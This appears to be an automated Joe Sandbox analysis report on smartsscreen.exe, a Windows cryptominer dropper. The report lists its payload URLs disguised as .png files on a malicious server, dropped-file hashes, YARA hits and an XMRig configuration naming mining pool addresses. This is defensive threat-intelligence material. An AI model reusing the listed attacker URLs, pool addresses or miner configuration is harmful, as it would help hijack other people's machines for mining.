http://https://-.://%s%s%s/%sall	curl.exe, 00000005.00000000.1880782517.0000000000454000.00000002.00000001.01000000.00000008.sdmp, curl.exe, 0000000D.00000002.1984019338.0000000000454000.00000002.00000001.01000000.00000008.sdmp, curl.exe, 0000000F.00000002.2015440744.0000000000454000.00000002.00000001.01000000.00000008.sdmp, curl.exe, 00000015.00000000.2116851620.0000000000454000.00000002.00000001.01000000.00000008.sdmp, curl.exe, 0000001D.00000002.2192971081.0000000000454000.00000002.00000001.01000000.00000008.sdmp, 8e77f5e1bc39c6408349bc8b0bfbe6cb.tmp.3.dr	false	Avira URL Cloud: safe	unknown
http://111.90.158.40:80/drives/kill.png?t=1716985546	curl.exe, 00000015.00000002.2138753199.0000000000820000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://xmrig.com/docs/algorithms	taskhostw.exe, 00000013.00000000.2053440832.0000000140397000.00000002.00000001.01000000.00000009.sdmp	false	URL Reputation: safe	unknown
http://111.90.158.40:80/drives/delete.png?t=1716985552-oC:	curl.exe, 0000001D.00000002.2193308149.0000000000790000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://curl.haxx.se/P	expand.exe, 00000003.00000003.1868975905.00000000029FB000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmp, curl.exe, 0000000D.00000000.1971643275.000000000047C000.00000008.00000001.01000000.00000008.sdmp, curl.exe, 0000000F.00000002.2015561971.000000000047C000.00000008.00000001.01000000.00000008.sdmp, curl.exe, 00000015.00000002.2138615831.000000000047C000.00000008.00000001.01000000.00000008.sdmp, curl.exe, 0000001D.00000000.2167369156.000000000047C000.00000008.00000001.01000000.00000008.sdmp, 8e77f5e1bc39c6408349bc8b0bfbe6cb.tmp.3.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://xmrig.com/benchmark/%s	taskhostw.exe, 00000013.00000000.2053440832.0000000140397000.00000002.00000001.01000000.00000009.sdmp	false	URL Reputation: safe	unknown
http://curl.haxx.se/docs/copyright.htmlDVarFileInfo$	expand.exe, 00000003.00000003.1868975905.00000000029FB000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmp, curl.exe, 0000000D.00000000.1971643275.000000000047C000.00000008.00000001.01000000.00000008.sdmp, curl.exe, 0000000F.00000002.2015561971.000000000047C000.00000008.00000001.01000000.00000008.sdmp, curl.exe, 00000015.00000002.2138615831.000000000047C000.00000008.00000001.01000000.00000008.sdmp, curl.exe, 0000001D.00000000.2167369156.000000000047C000.00000008.00000001.01000000.00000008.sdmp, 8e77f5e1bc39c6408349bc8b0bfbe6cb.tmp.3.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://hws.exeinvalidjsonrpckav.exekis.exelookup	smartsscreen.exe	false	Avira URL Cloud: safe	unknown
http://111.90.158.40:80/taskhostw.png?t=1716985523F_PRO	curl.exe, 00000005.00000002.1942238556.0000000000B30000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://111.90.158.40:80/config.json?t=1716985532-oC:	curl.exe, 0000000D.00000002.1983830750.00000000001F0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.avast.com0	expand.exe, 00000017.00000003.2151748117.0000000002BA3000.00000004.00000020.00020000.00000000.sdmp, 0bfdc61464f46f4e9af5455e9b3ded61.tmp.23.dr	false	Avira URL Cloud: safe	unknown
https://%s:%sicssuppnt.exeif-none-matchimage/svg	smartsscreen.exe	false	Avira URL Cloud: safe	unknown
http://111.90.158.40:80/WinRing0x64.png?t=1716985534PRO#o	curl.exe, 0000000F.00000002.2016325642.0000000000EA0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
93.95.225.137	unknown	Iceland	44925	THE-1984-ASIS	false
111.90.143.130	unknown	Malaysia	45839	SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMY	true
1.1.1.1	unknown	Australia	13335	CLOUDFLARENETUS	false
199.232.214.172	unknown	United States	54113	FASTLYUS	false
173.222.162.51	unknown	United States	35994	AKAMAI-ASUS	false
192.229.221.95	unknown	United States	15133	EDGECASTUS	false
173.222.162.32	unknown	United States	35994	AKAMAI-ASUS	false

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1448877
Start date and time:	2024-05-29 14:24:11 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 10m 11s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	40
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	smartsscreen.exe
Detection:	MAL
Classification:	mal100.evad.mine.winEXE@46/32@0/7
EGA Information:	Successful, ratio: 25%
HCA Information:	Successful, ratio: 100% Number of executed functions: 44 Number of non-executed functions: 236
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, backgroundTaskHost.exe, MoUsoCoreWorker.exe
Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target curl.exe, PID 7124 because there are no executed function
Execution Graph export aborted for target curl.exe, PID 7680 because there are no executed function
Execution Graph export aborted for target curl.exe, PID 928 because there are no executed function
HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtSetInformationFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
08:25:09	API Interceptor	161x Sleep call for process: smartsscreen.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
1.1.1.1	PO-230821_pdf.exe	Get hash	malicious	FormBook, NSISDropper	Browse	www.974dp.com/sn26/?kJBLpb8=qaEGeuQorcUQurUZCuE8d9pas+Z0M0brqtX248JBolEfq8j8F1R9i1jKZexhxY54UlRG&ML0tl=NZlpi
	AFfv8HpACF.exe	Get hash	malicious	Unknown	Browse	1.1.1.1/
	INVOICE_90990_PDF.exe	Get hash	malicious	FormBook	Browse	www.quranvisor.com/usvr/?mN9d3vF=HHrW7cA9N4YJlebHFvlsdlDciSnnaQItEG8Ccfxp291VjnjcuwoPACt7EOqEq4SWjIf8&Pjf81=-Zdd-V5hqhM4p2S
	Go.exe	Get hash	malicious	Unknown	Browse	1.1.1.1/
199.232.214.172	Honeygain_install.exe.zip	Get hash	malicious	Unknown	Browse
	https://drive.google.com/file/d/11Nff_nSTj-qAFgshL0mhor7fJP9kHxH0/view?usp=drive_web	Get hash	malicious	Quasar	Browse
	https://www.ammyy.com/it/downloads.html	Get hash	malicious	Flawedammyy	Browse
	https://www.ammyy.com/it/downloads.html	Get hash	malicious	Flawedammyy	Browse
	REF# 5495941179-documentation 2032Pfile.msg	Get hash	malicious	HTMLPhisher	Browse
	SummaryForm_esjsRkPpIukVFv.zip	Get hash	malicious	AsyncRAT, PureLog Stealer, zgRAT	Browse
	http://launch.getgo.com/launcher2/helper?token=e0-JlwZpYnk5RjfhNwQJAWSnycGxuTNEKMFcGUnp8bMbh1HaoP3nxnwmbsPoRN3nHS6IqeGWl2BtZZUCiukZPAadAO_rWBJQKlxiyBmgLzhLL5R1ewSQF5jnb934RWY3OJM4kRqjf_0K6R7ugG8LH4WlOOqPNJSmMAD3RS6UgEzBOJaT4rPu0bb59qQi8o861c7OLxMI07Ibv0hJmk7HIy2a92xS-gyU5pKlOvVQGniMuxPSF1Y2k0dJ7ra2hAUmCxtd7ob9yDXB05la9g0bQ38dMF0kvhP2rIVGwG36NAwouMDXY-2MML1XoElq2qVGdets-czFXiGaDVyOFme0t6cF1YereSTdXIEtXIzFxS1lrYL3AiV4hFsDVKqI1kqih-PHY4ks3RqBBIj3H1iVlVq_2U3M6VZflUvwyNSk_ZcHfCbJHyTQt10oMuj0lOFvXOTuhJST9RLaFmO5ibIH5ghIchA_BWTrCyQVmuuQQoEQ-jWemgg7keHjSvL1bR2V_VwnqgTgcf_VuVAuqEEQIekmsEEzCXev7G-pEchKLy2fT1tAyJJH9VB4Yx_vAKsd_0C38BiMHPEYdOMSboIQg-rfko0GyZWpzeel94gvtGvyMHY-jXpYAwX_2iK2KJpkVnbzstjnbhvopB2XYgkB4GiaV845Xp274vfZNI7_XUn7Ih_SbuB&downloadTrigger=javascript&renameFile=1	Get hash	malicious	Unknown	Browse
	https://webcompanion.com/nano_download.php?savename=Setup.exe&partner=IN230901&nonadmin&direct&tych&campaign=18022583703	Get hash	malicious	Unknown	Browse
	SecuriteInfo.com.Trojan.Siggen17.35688.9477.7627.exe	Get hash	malicious	Poisonivy	Browse
192.229.221.95	SecuriteInfo.com.Program.Unwanted.5510.19662.8210.exe	Get hash	malicious	Unknown	Browse
	http://www.torproject.org	Get hash	malicious	Unknown	Browse
	SecuriteInfo.com.Win32.PWSX-gen.28315.7841.exe	Get hash	malicious	Amadey, Fabookie, Mystic Stealer, RedLine, SmokeLoader, Xmrig	Browse
	SecuriteInfo.com.Trojan.Inject4.61510.5025.30434.exe	Get hash	malicious	Amadey, Fabookie, Healer AV Disabler, Mystic Stealer, RedLine, SmokeLoader, Xmrig	Browse
	SecuriteInfo.com.Win32.DropperX-gen.26839.16803.exe	Get hash	malicious	Amadey, Glupteba, Mystic Stealer, RedLine, SmokeLoader, Xmrig	Browse
	D8dw2h4OaE.exe	Get hash	malicious	FormBook, NSISDropper	Browse
	file.exe	Get hash	malicious	Mystic Stealer, RedLine, SmokeLoader, Xmrig	Browse
	file.exe	Get hash	malicious	Mystic Stealer, RedLine, SmokeLoader, Xmrig	Browse
	file.exe	Get hash	malicious	Mystic Stealer, RedLine, SmokeLoader, Xmrig	Browse
	file.exe	Get hash	malicious	Amadey, Djvu, Fabookie, Glupteba, RedLine, SmokeLoader, Xmrig	Browse
173.222.162.32	java.exe	Get hash	malicious	Tinba	Browse
	java.exe	Get hash	malicious	Tinba	Browse
	java.exe	Get hash	malicious	Tinba	Browse
	p2pWin.exe	Get hash	malicious	Petya / NotPetya, Mimikatz	Browse

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	SecuriteInfo.com.Trojan.DownLoader26.36535.3145.856.exe	Get hash	malicious	Unknown	Browse	188.114.96.3
	Due Invoice pdf.exe	Get hash	malicious	AgentTesla, PureLog Stealer, XWorm	Browse	104.26.13.205
	Enlisteditemsforrfq.doc	Get hash	malicious	Unknown	Browse	104.21.74.191
	http://mansaduch.com	Get hash	malicious	Unknown	Browse	104.17.2.184
	revised PI.xlam.xlsx	Get hash	malicious	AgentTesla	Browse	104.17.64.14
	RFQ.exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	AlvaradeFuncionamentoinfo3general.com.Lnk.lnk	Get hash	malicious	Unknown	Browse	188.114.97.3
	SWIFT COPY.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	TT COPY.doc	Get hash	malicious	Unknown	Browse	172.67.175.222
	orden de compra PO05272024.xlam.xlsx	Get hash	malicious	AgentTesla	Browse	104.17.64.14
FASTLYUS	http://t.co/YMBMR6DEIY	Get hash	malicious	HTMLPhisher	Browse	151.101.1.229
	Request For Quotation.js	Get hash	malicious	STRRAT	Browse	199.232.196.209
	Request For Quotation.js	Get hash	malicious	STRRAT	Browse	199.232.196.209
	https://bellavistainnovaong.com/A1/2f3f/.btf/?w=depau@depau.com	Get hash	malicious	Unknown	Browse	151.101.129.229
	https://venmo.com/story/3666451449833989812?k=None	Get hash	malicious	Unknown	Browse	151.101.2.133
	94411f0873e6410d644c8a630ffbdf387639fab05fbcda468a343ff3b5db246f_dump.bin.exe	Get hash	malicious	Ursnif	Browse	151.101.1.229
	https://contact-meta-policy-here.vercel.app/next.html/	Get hash	malicious	Unknown	Browse	185.199.109.133
	http://pdf-tools.vipnetsaas.com/login	Get hash	malicious	Unknown	Browse	151.101.194.137
	new.exe	Get hash	malicious	Unknown	Browse	185.199.108.133
	https://hbsonlinecouk.atlassian.net/wiki/external/OTBhODE5Njg4ODY2NGIxZjk5NTUyOWZhNjRlMDI4YjE	Get hash	malicious	HTMLPhisher	Browse	151.101.193.229
THE-1984-ASIS	SecuriteInfo.com.Win32.TrojanX-gen.3480.22759.exe	Get hash	malicious	Unknown	Browse	93.95.228.141
	SecuriteInfo.com.Win32.TrojanX-gen.3480.22759.exe	Get hash	malicious	Unknown	Browse	93.95.228.141
	Ma0hVedIX4.exe	Get hash	malicious	RedLine, SmokeLoader	Browse	93.95.228.74
	oh08CW9HdA.exe	Get hash	malicious	DCRat	Browse	185.112.144.202
	php.ini	Get hash	malicious	Unknown	Browse	185.112.145.216
	syslogd.elf	Get hash	malicious	Tsunami	Browse	93.95.229.203
	QAffsBvMaI.exe	Get hash	malicious	Unknown	Browse	185.112.144.167
	QAffsBvMaI.exe	Get hash	malicious	Unknown	Browse	185.112.144.167
	oracle.elf.old	Get hash	malicious	Unknown	Browse	93.95.227.177
	geLwbil2v1	Get hash	malicious	Unknown	Browse	93.95.227.177
SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMY	Doc#12037860003xls.exe	Get hash	malicious	Azorult, PureLog Stealer	Browse	111.90.143.196
	Stien.exe	Get hash	malicious	PureLog Stealer, zgRAT	Browse	111.90.159.210
	IMG79600253.exe	Get hash	malicious	Azorult, PureLog Stealer	Browse	111.90.143.196
	zhxTuNW2r5.exe	Get hash	malicious	PureLog Stealer, zgRAT	Browse	111.90.145.141
	Frgrkeysi_SC.cmd	Get hash	malicious	PureLog Stealer	Browse	111.90.145.132
	K2uc3PSJSu.exe	Get hash	malicious	PureLog Stealer, zgRAT	Browse	111.90.159.210
	rPOGm2fUiV.exe	Get hash	malicious	PureLog Stealer	Browse	111.90.145.132
	0qhXjhHbzk.exe	Get hash	malicious	PureLog Stealer, zgRAT	Browse	111.90.159.210
	gbound.hta	Get hash	malicious	Cobalt Strike, PureLog Stealer, zgRAT	Browse	111.90.159.210
	SecuriteInfo.com.Win32.TrojanX-gen.21642.1659.exe	Get hash	malicious	PureLog Stealer	Browse	111.90.145.132

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\Desktop\68541119c9044a71965dd10779c37578$dpx$.tmp\e05c47e9a5ef7741a882c017cc284dab.tmp	SecuriteInfo.com.Win32.TrojanX-gen.9663.10822.exe	Get hash	malicious	Xmrig	Browse
	kl9ssxROJa.exe	Get hash	malicious	Xmrig	Browse
	https://springs-citation-house-congressional.trycloudflare.com/win/print.exe	Get hash	malicious	Xmrig	Browse
	iCp2Rcgw44.exe	Get hash	malicious	Xmrig	Browse
	ktUvJww830.exe	Get hash	malicious	44Caliber Stealer, BitCoin Miner, Rags Stealer, SilentXMRMiner, Xmrig	Browse
	mav17final.exe	Get hash	malicious	Xmrig	Browse
	file.exe	Get hash	malicious	Xmrig	Browse
	taskhost.exe	Get hash	malicious	Xmrig	Browse
	file.exe	Get hash	malicious	Unknown	Browse
	Bc8Z5oJ25z.exe	Get hash	malicious	RedLine, Xmrig	Browse

Created / dropped Files

C:\Users\user\Desktop\32f5c1eec1ca463f8755c717d6e69bf8$dpx$.tmp\85c52a8e2c82a64aa548c49d685fe8f4.tmp

Download File

Process:	C:\Windows\SysWOW64\expand.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	5617152
Entropy (8bit):	6.635483682863182
Encrypted:	false
SSDEEP:	98304:uanQao4MuADrkyzh9eWQxIWE2Fd2FzJMAAT6Pa7zR4azwxA9tZLtQ:eao4MId2FzJMA3a7zGXAZLtQ
MD5:	BD877072C51EE58EC7AAF091BFF0B80C
SHA1:	41FCE204948DF6AF1FE2F3F6DEC02086678EAB3B
SHA-256:	35EB368C14AD25E3B1C58579EBAEAE71BDD8EF7F9CCECFC00474AA066B32A03F
SHA-512:	27E90612A735F1296DD3A80B7538A780B8A2D30A2F63782E90DDA1A12CA070D701C077719C50DED4FDBE68AF511F5767015EFE1137620B955E0ACE2AB397F655
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: C:\Users\user\Desktop\32f5c1eec1ca463f8755c717d6e69bf8$dpx$.tmp\85c52a8e2c82a64aa548c49d685fe8f4.tmp, Author: Joe Security Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: C:\Users\user\Desktop\32f5c1eec1ca463f8755c717d6e69bf8$dpx$.tmp\85c52a8e2c82a64aa548c49d685fe8f4.tmp, Author: unknown Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: C:\Users\user\Desktop\32f5c1eec1ca463f8755c717d6e69bf8$dpx$.tmp\85c52a8e2c82a64aa548c49d685fe8f4.tmp, Author: Florian Roth Rule: MALWARE_Win_CoinMiner02, Description: Detects coinmining malware, Source: C:\Users\user\Desktop\32f5c1eec1ca463f8755c717d6e69bf8$dpx$.tmp\85c52a8e2c82a64aa548c49d685fe8f4.tmp, Author: ditekSHen
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 62% Antivirus: Virustotal, Detection: 77%, Browse
Preview:	MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.......D...............e......e.......e.....R......R......R..&...e.............e..........e......4......&............].......5............Rich....................PE..d.....e.........."......T9..VF.....T.4........@..........................................`...................................................Q...............\|..............`......`.M.......................M.(.....M..............p9.(............................text....R9......T9................. ..`.rdata...]...p9..^...X9.............@..@.data.....+...Q.......Q.............@....pdata........\|.......R.............@..@_RANDOMXV.............T.............@..`_TEXT_CN.&.......(....T.............@..`_TEXT_CN.....@........U.............@..`.reloc.......`........U.............@..B........................................................................................................................

C:\Users\user\Desktop\68541119c9044a71965dd10779c37578$dpx$.tmp\e05c47e9a5ef7741a882c017cc284dab.tmp

Download File

Process:	C:\Windows\SysWOW64\expand.exe
File Type:	PE32+ executable (native) x86-64, for MS Windows
Category:	dropped
Size (bytes):	14544
Entropy (8bit):	6.2660301556221185
Encrypted:	false
SSDEEP:	192:nqjKhp+GQvzj3i+5T9oGYJh1wAoxhSF6OOoe068jSJUbueq1H2PIP0:qjKL+v/y+5TWGYOf2OJ06dUb+pQ
MD5:	0C0195C48B6B8582FA6F6373032118DA
SHA1:	D25340AE8E92A6D29F599FEF426A2BC1B5217299
SHA-256:	11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
SHA-512:	AB28E99659F219FEC553155A0810DE90F0C5B07DC9B66BDA86D7686499FB0EC5FDDEB7CD7A3C5B77DCCB5E865F2715C2D81F4D40DF4431C92AC7860C7E01720D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 5%
Joe Sandbox View:	Filename: SecuriteInfo.com.Win32.TrojanX-gen.9663.10822.exe, Detection: malicious, Browse Filename: kl9ssxROJa.exe, Detection: malicious, Browse Filename: , Detection: malicious, Browse Filename: iCp2Rcgw44.exe, Detection: malicious, Browse Filename: ktUvJww830.exe, Detection: malicious, Browse Filename: mav17final.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: taskhost.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: Bc8Z5oJ25z.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5:n.q[..q[..q[..q[..}[..V.{.t[..V.}.p[..V.m.r[..V.q.p[..V.\|.p[..V.x.p[..Richq[..................PE..d....&.H.........."..................P.......................................p..............................................................dP..<....`.......@..`...................p ............................................... ..p............................text............................... ..h.rdata..\|.... ......................@..H.data........0......................@....pdata..`....@......................@..HINIT...."....P...................... ....rsrc........`......................@..B................................................................................................................................................................................................................................................................................

C:\Users\user\Desktop\78996cc0913e428592859084f14a5a0d$dpx$.tmp\8e77f5e1bc39c6408349bc8b0bfbe6cb.tmp

Download File

Process:	C:\Windows\SysWOW64\expand.exe
File Type:	PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	490496
Entropy (8bit):	6.631784672516117
Encrypted:	false
SSDEEP:	12288:Uo2MSDvw5PRjcfUw14Y4tAGr+4yeg9opMT9NTE:uD45yfUHYyr+4nnsTE
MD5:	69CAC8A16EB9FDCDB1A1617842FD8DD9
SHA1:	C66E0065431BD034E366D98722A5CB1CDFEDBB56
SHA-256:	52FF78C647D18CA68552DEA4E1B51C7582E3B1302AF171A97CA641D3562F0561
SHA-512:	42BBEE0702477E65C29740867FAA92BB4AADBA84BC98E00EB008441810520DEBB91A9BBE51E19D348BA651CAB1AC9825B11D7235799D60531AD8EC9949C329B8
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......S.....................x...............0....@........................................... ......................p..`.......4................................6..................................................d................................text...............................`.P`.data........0......................@.`..rdata.......@......................@.`@.eh_fram.....@......................@.0@.bss....`....P........................`..edata..`....p....... ..............@.0@.idata..4............(..............@.0..CRT....4............<..............@.0..tls.... ............>..............@.0..rsrc................@..............@.0..reloc...6.......8...D..............@.0B........................................................................................................................................................................................

C:\Users\user\Desktop\WinRing0x64.png

Download File

Process:	C:\Users\user\Desktop\curl.exe
File Type:	Microsoft Cabinet archive data, Windows 2000/XP setup, 8137 bytes, 1 file, at 0x2c +A "WinRing0x64.sys", number 1, 1 datablock, 0x1 compression
Category:	modified
Size (bytes):	8137
Entropy (8bit):	7.973412297856193
Encrypted:	false
SSDEEP:	96:zsDLQSzFWfbSSAtWQ2BTuK4aCcbMaPmNKK5SYVmCAs5BDwWivHFhjkbYTBfkoakv:zKLQMmAEGK48bXCASDwWG/kbuzJFDxcG
MD5:	8D31AE369E67EE0B412D889299F2B4B2
SHA1:	C643A490023AA45806760A1B84D15C434A326E0B
SHA-256:	BE6B20E6A49225144E918E3607684F8BEBBF190AA30EF2F42F06A8EB4FDAEF6F
SHA-512:	7F312046908556FD24335B2CB93410BB3B158932EB66B6C20EE8336748E68463B3D6CA8DFA4AD303EE7193560E0C9B4F22BB6397AC5EA9E2E0E8FC82BE95BBD5
Malicious:	false
Preview:	MSCF............,...................L........8........cWI. .WinRing0x64.sys..u..u..8CK.9.XS..s....A.....q..E.@..E..;.!$...$..w.j....j...u..m]@.R.....}R........h....{...v..u.3g.3a.E....A7..@......Cwj......., .NyF%j..T}J.^.,Rt..Z.....u".N$...%.....^V.=..^..G;.;.s..Q...Y8cg..w.Y.f..[....5.D<........E%....w..C..>BM.......p..aa`...-..lK.,...j...."..>4@Q<...#...s-....V...Q..B......&...[ML......Z.....D.X.....M',....:5h.2%..!..GZ....;&N.(..T.F.b.'....x;,.......n.....Y......{...... .Li$e..K.c..B.J`.P9T..V.PX.J...C.WP.).....D....\|.D.....z.pM.]/.......q...\.4vX....c...WWl...J...(.r.\|...0...&.]g.1......KX.LY...,`.1...........\|.(.O..^...r....T..@.y@1..-G.;..}P.l.ba.E...p..E,.$.s..&.MRx!6h..o.p..<.......I..DA+..7.\...~..l.].......`.......K.`'I..@...pNL....w.2..LSa.:.Y...,R".3.f..DT1.xT..s......s.SB..{._...!.~.Xx.7...dl....DPG.p.U.d..."..!.+..MD5..G..dW....+p.....M...<.Ze.Y.#~...a..c..eg.H1=.?.-,..?.@8'..2.....a..d.x.....2#x2c._.0%%U\|II%.Xn'.sVb,o[RnS

C:\Users\user\Desktop\WinRing0x64.sys (copy)

Download File

Process:	C:\Windows\SysWOW64\expand.exe
File Type:	PE32+ executable (native) x86-64, for MS Windows
Category:	dropped
Size (bytes):	14544
Entropy (8bit):	6.2660301556221185
Encrypted:	false
SSDEEP:	192:nqjKhp+GQvzj3i+5T9oGYJh1wAoxhSF6OOoe068jSJUbueq1H2PIP0:qjKL+v/y+5TWGYOf2OJ06dUb+pQ
MD5:	0C0195C48B6B8582FA6F6373032118DA
SHA1:	D25340AE8E92A6D29F599FEF426A2BC1B5217299
SHA-256:	11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
SHA-512:	AB28E99659F219FEC553155A0810DE90F0C5B07DC9B66BDA86D7686499FB0EC5FDDEB7CD7A3C5B77DCCB5E865F2715C2D81F4D40DF4431C92AC7860C7E01720D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 5%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5:n.q[..q[..q[..q[..}[..V.{.t[..V.}.p[..V.m.r[..V.q.p[..V.\|.p[..V.x.p[..Richq[..................PE..d....&.H.........."..................P.......................................p..............................................................dP..<....`.......@..`...................p ............................................... ..p............................text............................... ..h.rdata..\|.... ......................@..H.data........0......................@....pdata..`....@......................@..HINIT...."....P...................... ....rsrc........`......................@..B................................................................................................................................................................................................................................................................................

C:\Users\user\Desktop\config.json

Download File

Process:	C:\Users\user\Desktop\curl.exe
File Type:	JSON data
Category:	modified
Size (bytes):	1250
Entropy (8bit):	4.361183165670329
Encrypted:	false
SSDEEP:	24:6T8bfLWoMuB8I675b2lZ/llbvECyHB2arUoODXn2DOIRwVLt46:6T8bfLWHW8b9b2lZ9lzECyHkJpDXCO1B
MD5:	E0DC65DBFBF42F6DD4B2C3645DC00FEC
SHA1:	02B449BEDB5D94CD3E64D279038B5D992D3E2EAC
SHA-256:	C1F454826119BE38E3FFB0346572631CA5E81B1B075F8B2359D5AFBB4E215860
SHA-512:	46A03979C1865D1C8FFFDC066F3C172ECE51F4670E5EEA8443FBA6FE3D6B2EADF676CDDA9E32CA14BF912095960236034CC1116B0230CA6CC5B28205B76E58FF
Malicious:	false
Preview:	{. "autosave": false,. "background": true,. "colors": true,. "title": true,. "randomx": {. "init": -1,. "init-avx2": -1,. "mode": "auto",. "1gb-pages": false,. "rdmsr": true,. "wrmsr": true,. "cache_qos": false,. "numa": true,. "scratchpad_prefetch_mode": 1. },. "cpu": {. "enabled": true,. "huge-pages": true,. "huge-pages-jit": false,. "hw-aes": null,. "priority": null,. "memory-pool": false,. "yield": true,. "max-threads-hint": 50,. "asm": true,. "cn/0": false,. "cn-lite/0": false. },. "donate-level": 0,. "donate-over-proxy": 0,. "pools": [. {. "url": "111.90.143.130:80". },. {. "url": "93.95.228.47:80". }. ],. "print-time": 60,. "health-print-time": 60,. "dmi": true,. "retries": 10,. "retry-pause": 10,.. "dns": {. "ipv6": false,.

C:\Users\user\Desktop\curl.exe (copy)

Download File

Process:	C:\Windows\SysWOW64\expand.exe
File Type:	PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	490496
Entropy (8bit):	6.631784672516117
Encrypted:	false
SSDEEP:	12288:Uo2MSDvw5PRjcfUw14Y4tAGr+4yeg9opMT9NTE:uD45yfUHYyr+4nnsTE
MD5:	69CAC8A16EB9FDCDB1A1617842FD8DD9
SHA1:	C66E0065431BD034E366D98722A5CB1CDFEDBB56
SHA-256:	52FF78C647D18CA68552DEA4E1B51C7582E3B1302AF171A97CA641D3562F0561
SHA-512:	42BBEE0702477E65C29740867FAA92BB4AADBA84BC98E00EB008441810520DEBB91A9BBE51E19D348BA651CAB1AC9825B11D7235799D60531AD8EC9949C329B8
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......S.....................x...............0....@........................................... ......................p..`.......4................................6..................................................d................................text...............................`.P`.data........0......................@.`..rdata.......@......................@.`@.eh_fram.....@......................@.0@.bss....`....P........................`..edata..`....p....... ..............@.0@.idata..4............(..............@.0..CRT....4............<..............@.0..tls.... ............>..............@.0..rsrc................@..............@.0..reloc...6.......8...D..............@.0B........................................................................................................................................................................................

C:\Users\user\Desktop\curl.png

Download File

Process:	C:\Users\user\Desktop\smartsscreen.exe
File Type:	Microsoft Cabinet archive data, Windows 2000/XP setup, 269597 bytes, 1 file, at 0x2c +A "curl.exe", number 1, 15 datablocks, 0x1 compression
Category:	dropped
Size (bytes):	269597
Entropy (8bit):	7.998292976061377
Encrypted:	true
SSDEEP:	6144:coYsmwmLJl/hEVClOrHvPnkX3MmhexlD29yGyXeAP9oj2NvBTBLPA:fm7aVClqHvPkHfGD29pyeg9oje5T9A
MD5:	ECA70588D25CEF61C5F903ED6E275709
SHA1:	018AFDB9359585EFE15F173B2D9168880DE27204
SHA-256:	95D0C1184CF8D22F466EF9A25E98662B9CC33E054658453BF1A152BF5E5FC4C1
